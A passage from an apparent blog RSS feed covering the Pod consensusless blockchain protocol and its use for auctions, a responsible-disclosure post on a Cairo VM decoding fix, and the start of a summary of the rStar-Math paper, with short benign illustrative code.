&lt;p&gt;Whenever a client connects to the replica, it adds the client to the connected client list (9) and sends all votes to the client (10-12). When a client performs a write, the replica first checks that the transaction is not a duplicate (15, returning if it is) and then answers with a vote.&lt;&#x2F;p&gt;
&lt;p&gt;The vote is performed in the following way:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The replica gets the timestamp and next serial number, and signs a message containing the transaction, the timestamp, and the serial number (step 19).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The replica appends the transaction to its log, if valid (20).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. The replica sends the vote to all the clients (21-23).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. The replica updates the next serial number, increasing it by 1 (24).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;extensions&quot;&gt;Extensions&lt;&#x2F;h2&gt;
&lt;p&gt;Pod-core is a very simple core, where clients can read and write, and replicas keep logs of transactions and vote. There are extensions borrowed from traditional databases that we can use to enhance performance or add features. The extensions are added in a trust-minimized way, so that the security of the network still relies only on the security of pod-core.&lt;&#x2F;p&gt;
&lt;p&gt;We can use secondaries, separating the computers handling the read and write instructions. The secondaries are untrusted, read-only nodes that serve the requests from clients. They receive signed updates from write nodes (validators), keep them cached, and forward them to subscribed nodes. They do not sign any messages, and the worst they can do is stop responding. In that case, the user just switches to another secondary for the same validator.&lt;&#x2F;p&gt;
&lt;p&gt;Even though the reads are no longer handled by the validators, clients still need to send their writes to all the validators, which is neither practical nor economical. We can solve this by incorporating untrusted gateways, which maintain an open connection to all validators. When a client wants to submit a transaction, it contacts a gateway, which forwards the transaction to all validators, receives the signatures back, assembles a certificate consisting of at least $\alpha$ signatures, and sends everything back to the client. Gateways do not sign transactions and, if one refuses to forward transactions, the client can switch to another.&lt;&#x2F;p&gt;
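&lt;p&gt;A rough sketch of that gateway flow (the validator interface and certificate layout here are hypothetical):&lt;&#x2F;p&gt;

```python
# Hypothetical gateway: forward the transaction to every validator, gather
# signed votes, and assemble a certificate once alpha signatures arrive.
def submit_via_gateway(tx, validators, alpha):
    signatures = []
    for v in validators:                 # gateway keeps open connections to all
        sig = v.sign_vote(tx)            # validator answers with a signed vote
        if sig is not None:
            signatures.append((v.name, sig))
        if len(signatures) >= alpha:     # enough votes for a certificate
            return {"tx": tx, "certificate": signatures}
    return None                          # too few validators responded
```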
&lt;p&gt;We can also reduce the amount of data storage by active validators using Merkle Mountain Ranges, reducing the requirements to run a validator, which, in turn, helps in increasing the decentralization of the network.&lt;&#x2F;p&gt;
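&lt;p&gt;To illustrate why Merkle Mountain Ranges reduce storage, here is a generic append-only MMR kept as a list of perfect-tree peaks, so a node stores O(log n) digests instead of the full history; this is an illustration, not the exact construction used by pod:&lt;&#x2F;p&gt;

```python
import hashlib

def _node(left, right):
    return hashlib.sha256(left + right).digest()

class MMR:
    def __init__(self):
        self.peaks = []  # list of (height, digest), heights strictly decreasing

    def append(self, leaf):
        height, digest = 0, hashlib.sha256(leaf).digest()
        # merge equal-height peaks, like carrying in a binary counter
        while self.peaks and self.peaks[-1][0] == height:
            _, left = self.peaks.pop()
            digest = _node(left, digest)
            height += 1
        self.peaks.append((height, digest))

    def root(self):
        # "bag" the peaks into a single commitment
        acc = self.peaks[-1][1]
        for _, digest in reversed(self.peaks[:-1]):
            acc = _node(digest, acc)
        return acc
```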
&lt;h2 id=&quot;implications-for-blockchain-design&quot;&gt;Implications for Blockchain Design&lt;&#x2F;h2&gt;
&lt;p&gt;For blockchain designers, the key takeaway is that any system optimized solely for high TPS may still fall short if its consensus mechanism introduces significant delays. Pod’s design philosophy—achieving optimal latency (2δ) through a consensusless, client-driven approach—addresses this by focusing on the true metric of performance: time-to-finality.&lt;&#x2F;p&gt;
&lt;p&gt;In practical terms, this means that blockchain systems need to:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Optimize for Low Latency:** Rather than simply increasing the number of transactions that can be processed per second, developers should strive to reduce the number of communication rounds required for consensus.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Minimize Overhead:** Eliminating unnecessary inter-node communication (as Pod does) can lead to dramatic improvements in confirmation times.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Reevaluate Throughput Metrics:** Marketing a blockchain based solely on TPS can be misleading; metrics such as average confirmation time and the worst-case time-to-finality are more indicative of real-world performance.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;real-time-auctions-and-the-limitations-of-leader-based-consensus&quot;&gt;Real-Time Auctions and the Limitations of Leader-Based Consensus&lt;&#x2F;h2&gt;
&lt;p&gt;Another critical application domain where consensus latency plays a central role is that of real-time auctions. Traditional blockchains are ill-suited for auctions because of inherent delays and vulnerabilities associated with leader-based ordering. In this section, we explore the challenges that auctions face in blockchain environments and how alternative consensus approaches can provide a better foundation for auction applications.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;auctions-in-the-blockchain-ecosystem&quot;&gt;Auctions in the Blockchain Ecosystem&lt;&#x2F;h2&gt;
&lt;p&gt;Auctions have long been a cornerstone of economic activity—from art sales to spectrum auctions—and have found numerous applications in the blockchain space:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **MEV (Maximal Extractable Value):** On Ethereum, there are auctions where block builders compete for the right to capture extra value through transaction ordering.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Decentralized Finance (DeFi):** Protocols like CowSwap, UniswapX, and dYdX employ auction mechanisms to determine optimal order flows and to settle trades.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Liquidation Auctions:** Lending protocols such as MakerDAO and Aave rely on auctions to liquidate collateral when borrowers fall below required thresholds.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Sequencing Rights:** Emerging systems like Espresso auctions share sequencing rights among multiple Layer 2 (L2) solutions, attempting to maximize throughput and fairness.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Despite these varied applications, the common thread is that the auction outcome depends critically on the ordering of bids and the rapid inclusion of all valid bids before a deadline.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;vulnerabilities-of-leader-based-consensus-in-auctions&quot;&gt;Vulnerabilities of Leader-Based Consensus in Auctions&lt;&#x2F;h2&gt;
&lt;p&gt;Most blockchains today rely on a leader-based architecture where one node (or a small group of nodes) is entrusted with proposing the next block. This design, while effective for ensuring global consensus, introduces several vulnerabilities in auction scenarios:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Censorship:** A leader has the power to censor transactions. In an auction, a leader might suppress competing bids to ensure that a colluding party wins the auction.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Last-Look Attacks:** In a leader-based system, a malicious leader can wait until the deadline to observe the current set of bids, then insert its own bid that is just slightly higher. This “last-look” strategy can subvert the fairness of the auction.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Delayed Finality:** The multiple rounds required for consensus in traditional systems can lead to delays that are unacceptable for real-time auctions. If bids are finalized too slowly, the auction outcome may not reflect the true state of the market at the moment of settlement.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;a-consensusless-approach-for-auctions&quot;&gt;A Consensusless Approach for Auctions&lt;&#x2F;h2&gt;
&lt;p&gt;Given the shortcomings of leader-based consensus for auctions, the pod protocol presents a promising alternative. By eliminating the need for inter-replica communication during the transaction write phase, Pod can:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Reduce Finality Delays:** With a target of 2δ latency, auctions can be concluded almost in real time, making them suitable for high-frequency and high-stakes bidding.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Mitigate Censorship and Reordering:** Since there is no single leader with unilateral control over the ordering of transactions, the risk of censorship or last-look manipulation is greatly reduced.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Enable Local Computation of Auction Outcomes:** In Pod, clients (or auctioneers) can collect the logs from various replicas and compute the set of bids. Since the ordering is not strictly enforced globally, the auction outcome is derived from the aggregated bid set—a process that is inherently more robust against adversarial manipulation.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The “past-perfection” property of Pod ensures that once bids are confirmed, they remain in the ledger permanently. This is particularly important for auctions, where the integrity of the bid set is paramount.&lt;&#x2F;p&gt;
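&lt;p&gt;As a toy example, an auctioneer can resolve a sealed deadline auction purely from the aggregated, confirmed bid set (field names are illustrative, not part of the protocol):&lt;&#x2F;p&gt;

```python
# Resolve an auction from confirmed bids: only bids whose confirmed round
# is at or before the deadline count toward the outcome.
def auction_winner(confirmed_bids, deadline):
    eligible = [b for b in confirmed_bids if not b["rconf"] > deadline]
    if not eligible:
        return None
    # the outcome depends only on the aggregated bid set, not on bid order
    return max(eligible, key=lambda b: b["amount"])
```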
&lt;h2 id=&quot;benefits-for-decentralized-auctions&quot;&gt;Benefits for Decentralized Auctions&lt;&#x2F;h2&gt;
&lt;p&gt;Transitioning to a consensusless model for auctions offers several compelling benefits:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Faster Settlement:** Auctions can be resolved in near real time, enhancing user experience and enabling new business models such as flash auctions or real-time bidding for digital advertising.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Fairer Outcomes:** By removing the centralized role of the block proposer, the auction system becomes less prone to manipulation, ensuring that all valid bids are considered equally.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Enhanced Accountability:** Any attempt to censor or manipulate bids can be traced to specific replicas, ensuring that misbehavior is detectable and punishable.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;These features not only improve the functioning of existing auction mechanisms but also open up possibilities for innovative auction-based applications that require extremely low latency and high fairness.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;The landscape of blockchain technology is undergoing a profound transformation. Traditional consensus protocols, which have served as the backbone of early blockchain systems, are being reimagined to meet the demands of modern applications that require both high throughput and ultra-low latency. In this post, we have explored several ideas:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Pod’s Novel Approach:** By eliminating inter-replica communication during transaction submission and leveraging client-side aggregation of replica logs, Pod achieves transaction confirmation within the physical lower bound of 2δ. This design not only minimizes latency but also enhances censorship resistance and accountability.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Reevaluating Blockchain Performance:** The oft-cited metric of TPS (transactions per second) does not capture the true performance of a blockchain. Instead, time-to-finality—the time it takes for a transaction to be irrevocably confirmed—is a more meaningful measure.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Challenges in Real-Time Auctions:** Leader-based consensus protocols have inherent vulnerabilities that make them unsuitable for applications such as real-time auctions. By adopting a consensusless model, as demonstrated by Pod, these applications can achieve rapid confirmation and mitigate risks such as censorship and last-look attacks.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;</description>
      </item>
      <item>
          <title>Responsible disclosure: A potential sequencer-prover inconsistency in the Cairo VM</title>
          <pubDate>Fri, 07 Feb 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/responsible-disclosure-a-potential-sequencer-prover-inconsistency-in-the-cairo-vm/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/responsible-disclosure-a-potential-sequencer-prover-inconsistency-in-the-cairo-vm/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/responsible-disclosure-a-potential-sequencer-prover-inconsistency-in-the-cairo-vm/">&lt;h2 id=&quot;overview&quot;&gt;Overview&lt;&#x2F;h2&gt;
&lt;p&gt;On Sunday, January 26th, Starkware informed us that they had found a critical issue in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;cairo-vm&quot;&gt;Cairo VM&lt;&#x2F;a&gt; related to a program that would successfully execute on the VM but would violate the AIR constraints. The bug was found while investigating a separate issue reported by a third party, and a fix was already implemented in a PR. The PR was merged and a release containing the fix was cut. You can read Starkware’s disclosure post &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;community.starknet.io&#x2F;t&#x2F;remediating-a-potential-sequencer-prover-inconsistency-in-the-cairo-vm&#x2F;115313&quot;&gt;here&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;technical-implementation&quot;&gt;Technical Implementation&lt;&#x2F;h3&gt;
&lt;p&gt;The fix in pull request &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;cairo-vm&#x2F;pull&#x2F;1925&quot;&gt;#1925&lt;&#x2F;a&gt; adds two changes:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Additional verification while decoding instructions&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Additional verification on `verify_secure_runner`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;instruction-decoding-call-instruction&quot;&gt;Instruction Decoding: Call Instruction&lt;&#x2F;h4&gt;
&lt;p&gt;The call instruction does roughly the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Saves the current frame pointer to `[ap]`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Saves the call return address to `[ap + 1]`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Updates both `fp` and `ap` to `ap + 2`, skipping over the saved data.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Updates the `pc` to the start of the target function&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;As some of the flags of the call instruction are fixed, we can verify that:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The `dst` register holds `ap+0`, where the current frame pointer will be stored.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;dst_register == AP&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;dst_offset   == 0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The `op0` register holds `ap+1`, where the call return address will be stored.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;op0_register == AP&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;op0_offset   == 1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Both `fp` and `ap` are updated to `ap+2`:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;ap_update == Add2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fp_update == APPlus2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If these conditions are not met, the decoding fails.&lt;&#x2F;p&gt;
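&lt;p&gt;The checks above can be sketched as follows (enum values and field names mirror the prose rather than the actual Rust types of cairo-vm):&lt;&#x2F;p&gt;

```python
# Sketch of the extra decoder validation for a `call` instruction.
AP, FP = "AP", "FP"

def validate_call(inst):
    checks = [
        inst["dst_register"] == AP and inst["dst_offset"] == 0,  # [ap] stores fp
        inst["op0_register"] == AP and inst["op0_offset"] == 1,  # [ap+1] stores return pc
        inst["ap_update"] == "Add2",                             # ap becomes ap + 2
        inst["fp_update"] == "APPlus2",                          # fp becomes ap + 2
    ]
    if not all(checks):
        raise ValueError("invalid flag combination for call instruction")
```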
&lt;h4 id=&quot;instruction-decoding-return-instruction&quot;&gt;Instruction Decoding: Return Instruction&lt;&#x2F;h4&gt;
&lt;p&gt;The return instruction does roughly the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Restores the previous frame pointer (at `[fp - 2]`)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Jumps to the call return address (at `[fp - 1]`)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;As some of the flags of the return instruction are fixed, we can verify that:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The program counter is updated with an absolute jump&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pc_update == Jump&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The jump location is taken from `res`, which equals `fp-1`:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;res_logic   == Op1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;op1_offset  == -1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;op1_address == FP&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The next frame pointer is taken from `dst`, which equals `fp-2`&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fp_update    == Dst&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;dst_register == FP&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;dst_offset   == -2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If these conditions are not met, the decoding also fails.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;conditional-jump&quot;&gt;Conditional Jump&lt;&#x2F;h4&gt;
&lt;p&gt;This PR also enforces that when &lt;code&gt;pc_update&lt;&#x2F;code&gt; is equal to &lt;code&gt;4&lt;&#x2F;code&gt; (conditional jump), then &lt;code&gt;res_logic&lt;&#x2F;code&gt; must equal &lt;code&gt;0&lt;&#x2F;code&gt; (which implies ignoring that field).&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;This behavior is documented in the Cairo Whitepaper, page 33:&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;if pc_update == 4:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    if res_logic == 0 &amp;amp;&amp;amp; opcode == 0 &amp;amp;&amp;amp; ap_update != 1:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        res = Unused&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    else:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        Undefined Behavior&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h4 id=&quot;secure-runner-verification&quot;&gt;&lt;strong&gt;Secure runner verification&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;The &lt;code&gt;verify_secure_runner&lt;&#x2F;code&gt; function verifies that the completed run in a runner is safe to be relocated and used by other Cairo programs.&lt;&#x2F;p&gt;
&lt;p&gt;The PR verifies that the final frame pointer coincides with the caller’s frame pointer, stored at &lt;code&gt;[initial_frame_pointer - 2]&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
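&lt;p&gt;A minimal sketch of that check (hypothetical helper and memory model, not the actual cairo-vm API; it also ignores the segment&#x2F;offset distinction that the two execution modes below make):&lt;&#x2F;p&gt;

```python
def verify_final_fp(memory, initial_fp, final_fp):
    """Sketch: the run's final frame pointer must equal the caller's
    frame pointer, which the call convention stores at [initial_fp - 2].
    `memory` is a dict-like address -> value map (hypothetical names)."""
    return final_fp == memory[initial_fp - 2]
```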
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * When using `ExecutionMode::ProofModeCanonical`, the whole address must match.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * When using `ExecutionMode::RunnerMode`, only the offset must match.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;impact-analysis&quot;&gt;Impact Analysis&lt;&#x2F;h3&gt;
&lt;p&gt;As noted in Starkware’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;community.starknet.io&#x2F;t&#x2F;remediating-a-potential-sequencer-prover-inconsistency-in-the-cairo-vm&#x2F;115313&quot;&gt;release&lt;&#x2F;a&gt;:&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;“Since the missing check was in the sequencer and not the prover this has no implication whatsoever on the correctness or security of Starknet. In theory, it could have created a situation that a transaction that appears to have passed will later be reverted (reorg)”&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;the main risk was that transactions from &lt;code&gt;Cairo0&lt;&#x2F;code&gt; contracts could execute on the sequencer and then revert instead of being proved. Since such a transaction would not pass the prover, there is no risk of an incorrect transaction being proved, but the revert would impact user experience.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;As we’ve stated before, issues such as this one are always possible, and even likely, in complex software. They highlight the importance of having multiple teams paying attention to security, close collaboration between those teams, simple codebases, and careful scrutiny of the interactions between components.&lt;&#x2F;p&gt;
&lt;p&gt;Many thanks to Starkware for the notice and quick fix!&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Summary on rStar-Math: showing how smaller LLMs can outperform bigger ones with deep thinking</title>
          <pubDate>Tue, 28 Jan 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/summary-on-rstar-math-showing-how-smaller-llms-can-outperform-bigger-ones-with-deep-thinking/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/summary-on-rstar-math-showing-how-smaller-llms-can-outperform-bigger-ones-with-deep-thinking/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/summary-on-rstar-math-showing-how-smaller-llms-can-outperform-bigger-ones-with-deep-thinking/">&lt;p&gt;&lt;strong&gt;TL;DR&lt;&#x2F;strong&gt; : this post addresses the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;2501.04519&quot;&gt;paper introducing rStar-Math&lt;&#x2F;a&gt; and the techniques for smaller language models to outperform more complex large language models on math-related tasks. You can check the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;zhentingqi&#x2F;rStar&quot;&gt;code here&lt;&#x2F;a&gt;. rStar-Math significantly improved the math reasoning abilities of SLMs. For instance, on the MATH benchmark, it enhanced Qwen2.5-Math-7B’s performance from 58.8% to 90.0% and Phi3-mini-3.8B’s from 41.4% to 86.4%, surpassing OpenAI’s o1-preview model. Additionally, on the USA Math Olympiad (AIME), rStar-Math solved an average of 53.3% of problems, ranking among the top 20% of high school math students.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
